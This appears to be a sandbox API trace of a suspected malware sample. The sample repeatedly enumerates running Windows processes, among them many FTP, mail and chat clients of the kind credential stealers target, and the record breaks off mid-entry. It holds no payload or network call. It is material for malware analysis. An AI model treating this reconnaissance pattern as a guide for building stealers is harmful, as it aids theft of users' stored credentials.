[0234.234] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0234.235] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0234.237] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.238] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0234.240] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.241] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0234.243] CloseHandle (hObject=0x1b08) returned 1 [0234.243] Sleep (dwMilliseconds=0x64) [0234.355] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0234.366] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.368] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0234.371] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0234.373] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.375] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0234.376] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.378] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0234.379] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0234.381] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0234.382] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.383] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.385] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0234.386] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.388] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.389] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.391] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.392] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.393] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.395] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.396] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0234.398] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0234.399] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0234.400] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.451] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.452] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0234.454] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0234.455] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0234.456] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0234.457] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.459] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0234.460] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.461] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.463] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.464] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0234.466] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0234.467] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0234.468] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0234.470] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0234.471] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0234.472] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0234.474] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0234.475] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0234.476] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0234.478] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0234.479] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0234.480] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0234.482] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0234.483] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0234.484] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0234.486] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0234.487] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0234.489] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0234.490] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0234.491] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0234.492] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0234.494] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0234.502] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0234.503] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0234.505] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0234.507] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0234.508] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0234.510] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0234.512] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0234.514] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0234.516] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0234.518] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0234.520] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0234.522] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0234.524] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0234.526] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0234.528] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0234.530] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0234.531] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0234.533] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0234.534] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0234.536] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0234.538] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0234.539] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 